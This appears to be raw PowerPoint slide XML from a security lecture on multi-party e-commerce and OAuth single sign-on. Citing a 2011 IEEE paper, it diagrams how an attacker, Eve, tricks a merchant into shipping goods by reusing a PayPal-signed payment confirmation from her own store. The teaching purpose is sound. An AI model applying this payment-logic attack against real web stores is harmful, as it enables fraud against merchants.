      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1197" name="TextBox 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35640" y="6180480"/>
            <a:ext cx="4151520" cy="81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ambria"/>
              </a:rPr>
              <a:t>Wang, Rui, et al. "How to shop for free online--Security analysis of cashier-as-a-service based Web stores." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Security and Privacy (SP), 2011 IEEE Symposium on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>. IEEE, 2011.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258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Multi-Party E-Commerce Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1199" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="1569240"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1200" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4648320"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1201" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6559200" y="1567080"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4015440" y="5777280"/>
            <a:ext cx="12085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mbria"/>
              </a:rPr>
              <a:t>Client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203" name="Picture 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403760" y="2882880"/>
            <a:ext cx="1359000" cy="46944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204" name="Picture 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866960" y="2748960"/>
            <a:ext cx="2133360" cy="7372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205" name="Straight Arrow Connector 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1597680" y="3605400"/>
            <a:ext cx="1861200" cy="197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06" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305800" y="3767040"/>
            <a:ext cx="2500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I’d like the $40 Vest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07" name="Straight Arrow Connector 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2003400" y="3616560"/>
            <a:ext cx="1577520" cy="1585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08" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122760" y="4091760"/>
            <a:ext cx="268740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Redirect to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paypal.com/pay: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id=123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total=40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callback = jimmy.com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1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Signed by Jimmy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09" name="Straight Arrow Connector 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5560200" y="3485880"/>
            <a:ext cx="840240" cy="101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0" name="TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191640" y="3725280"/>
            <a:ext cx="255708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Redirect to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paypal.com/pay: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id=123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total=40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callback = jimmy.com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1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Signed by Jimmy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11" name="Straight Arrow Connector 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5712480" y="3638160"/>
            <a:ext cx="840240" cy="101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2" name="Straight Arrow Connector 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5864760" y="3790800"/>
            <a:ext cx="840240" cy="101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3" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142680" y="4299120"/>
            <a:ext cx="1877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Here’s my $40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14" name="Straight Arrow Connector 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6017400" y="3943080"/>
            <a:ext cx="840240" cy="101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5" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6409800" y="4603680"/>
            <a:ext cx="2603520" cy="173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Redirect to jimmy.com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total = 40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Paid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1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Signed by PayPal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216" name="Picture 39"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5390280" y="5456880"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6145200" y="3974400"/>
            <a:ext cx="16336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Give me $40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18" name="Straight Arrow Connector 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1398960" y="3712680"/>
            <a:ext cx="1861200" cy="197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9" name="TextBox 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207000" y="4422600"/>
            <a:ext cx="26874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paypal.com/pay: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total=40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1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Signed by PayPal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0" name="Straight Arrow Connector 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2472840" y="3681360"/>
            <a:ext cx="1279440" cy="13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21" name="TextBox 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2740680" y="3593520"/>
            <a:ext cx="28389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Signature checks out.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Sending you your vest.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2" name="Straight Arrow Connector 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2472120" y="1828800"/>
            <a:ext cx="3812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23" name="TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119840" y="1324440"/>
            <a:ext cx="7603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$40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24" name="TextBox 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35640" y="6180480"/>
            <a:ext cx="4151520" cy="81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ambria"/>
              </a:rPr>
              <a:t>Wang, Rui, et al. "How to shop for free online--Security analysis of cashier-as-a-service based Web stores." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Security and Privacy (SP), 2011 IEEE Symposium on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>. IEEE, 2011.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314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Multi-Party E-Commerce Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1226" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1569240"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1227" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4648320"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1228" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705720" y="1567080"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4178520" y="5780160"/>
            <a:ext cx="781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mbria"/>
              </a:rPr>
              <a:t>Eve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230" name="Picture 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7549920" y="2882880"/>
            <a:ext cx="1359000" cy="46944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231" name="Picture 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346400" y="2748960"/>
            <a:ext cx="2133360" cy="7372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232" name="Straight Arrow Connector 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1597680" y="3605400"/>
            <a:ext cx="1861200" cy="197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3" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305800" y="3767040"/>
            <a:ext cx="2500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I’d like the $40 Vest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4" name="Straight Arrow Connector 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2003400" y="3616560"/>
            <a:ext cx="1577520" cy="1585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5" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122760" y="4091760"/>
            <a:ext cx="268740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Redirect to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paypal.com/pay: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id=123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total=40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callback = jimmy.com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1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Signed by Jimmy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6" name="Straight Arrow Connector 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5560200" y="3485880"/>
            <a:ext cx="840240" cy="101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7" name="TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191640" y="3725280"/>
            <a:ext cx="271728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Redirect to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paypal.com/pay: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id=123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total=40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callback = jimmy.com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1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Signed by Eve’s Store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8" name="Straight Arrow Connector 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5712480" y="3638160"/>
            <a:ext cx="840240" cy="101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9" name="Straight Arrow Connector 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5864760" y="3790800"/>
            <a:ext cx="840240" cy="101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0" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142680" y="4299120"/>
            <a:ext cx="1877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Here’s my $40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1" name="Straight Arrow Connector 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6017400" y="3943080"/>
            <a:ext cx="840240" cy="101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2" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6409800" y="4603680"/>
            <a:ext cx="2603520" cy="173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Redirect to jimmy.com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total = 40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Paid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1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Signed by PayPal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3" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6145200" y="3974400"/>
            <a:ext cx="16336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Give me $40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4" name="Straight Arrow Connector 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1398960" y="3712680"/>
            <a:ext cx="1861200" cy="197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5" name="TextBox 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207000" y="4422600"/>
            <a:ext cx="26874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paypal.com/pay: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total=40</a:t>
            </a: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1800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Signed by PayPal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6" name="Straight Arrow Connector 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2472840" y="3681360"/>
            <a:ext cx="1279440" cy="13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7" name="TextBox 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2740680" y="3593520"/>
            <a:ext cx="28389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Signature checks out.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Sending you your vest.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248" name="Picture 35"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5370840" y="5459040"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1249" name="Picture 36"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3704400" y="1569240"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1250" name="Picture 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4424040" y="2747160"/>
            <a:ext cx="2121120" cy="73296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251" name="Straight Arrow Connector 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5064840" y="2447280"/>
            <a:ext cx="1479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headEnd type="triangle" w="med" len="med"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2" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5135760" y="1414080"/>
            <a:ext cx="16318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Eve makes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store linked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to PayPal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3" name="Straight Arrow Connector 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5078160" y="1981080"/>
            <a:ext cx="1474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4" name="TextBox 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5532120" y="1528920"/>
            <a:ext cx="614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$40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5" name="TextBox 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35640" y="6180480"/>
            <a:ext cx="4151520" cy="81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ambria"/>
              </a:rPr>
              <a:t>Wang, Rui, et al. "How to shop for free online--Security analysis of cashier-as-a-service based Web stores." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Security and Privacy (SP), 2011 IEEE Symposium on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>. IEEE, 2011.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256" name="Picture 45"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3038400" y="1227600"/>
            <a:ext cx="840240" cy="840240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1257" name="Picture 46"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="198000" y="1211760"/>
            <a:ext cx="633600" cy="633600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1258" name="Picture 47"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8035200" y="1298160"/>
            <a:ext cx="633600" cy="633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09612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Single Sign-On: OAuth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1260" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838080" y="1768680"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1261" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3355920" y="4986360"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1262" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797520" y="1768680"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1263" name="Straight Arrow Connector 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2351160" y="3882960"/>
            <a:ext cx="1350360" cy="122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4" name="Straight Arrow Connector 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5228640" y="3672720"/>
            <a:ext cx="1218960" cy="11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5" name="Straight Arrow Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2760840" y="2246400"/>
            <a:ext cx="3344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6" name="Straight Arrow Connector 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2760120" y="2759400"/>
            <a:ext cx="3344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7" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3795120" y="6116400"/>
            <a:ext cx="10270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mbria"/>
              </a:rPr>
              <a:t>Alice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268" name="Picture 2" descr="Facebook Changes"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693560" y="2909160"/>
            <a:ext cx="783720" cy="838440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1269" name="Picture 4" descr="File:Udacity Logo.svg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect b="27970"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1542600" y="2863080"/>
            <a:ext cx="1183680" cy="930240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1270" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674640" y="4103280"/>
            <a:ext cx="2209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I’d like to sign in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with Facebook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71" name="Straight Arrow Connector 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687040" y="3793680"/>
            <a:ext cx="1114560" cy="109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2" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700720" y="3404520"/>
            <a:ext cx="28328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Redirect to Facebook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(include callback URL)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and identifier Z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73" name="Straight Arrow Connector 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="5380920" y="3825360"/>
            <a:ext cx="1218960" cy="11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4" name="TextBox 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310440" y="3833280"/>
            <a:ext cx="27187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Give your permission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to Udacity?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75" name="Straight Arrow Connector 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5533560" y="3977640"/>
            <a:ext cx="1218960" cy="11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6" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6064200" y="4564800"/>
            <a:ext cx="729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Yeah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77" name="Straight Arrow Connector 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="5685480" y="4130280"/>
            <a:ext cx="1218960" cy="11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8" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6036480" y="5082840"/>
            <a:ext cx="27619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OK. Here’s a special token “X”. Redirect to callback with identifier Z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79" name="Straight Arrow Connector 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2134440" y="4103280"/>
            <a:ext cx="1221120" cy="1107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0" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536040" y="4813560"/>
            <a:ext cx="2673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Here’s the token “X”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for user Z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1" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2341080" y="1794960"/>
            <a:ext cx="4212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Who has token “X”? My secret is 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2" name="TextBox 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354960" y="1330200"/>
            <a:ext cx="2374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Facebook secret: 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3" name="TextBox 37"/>
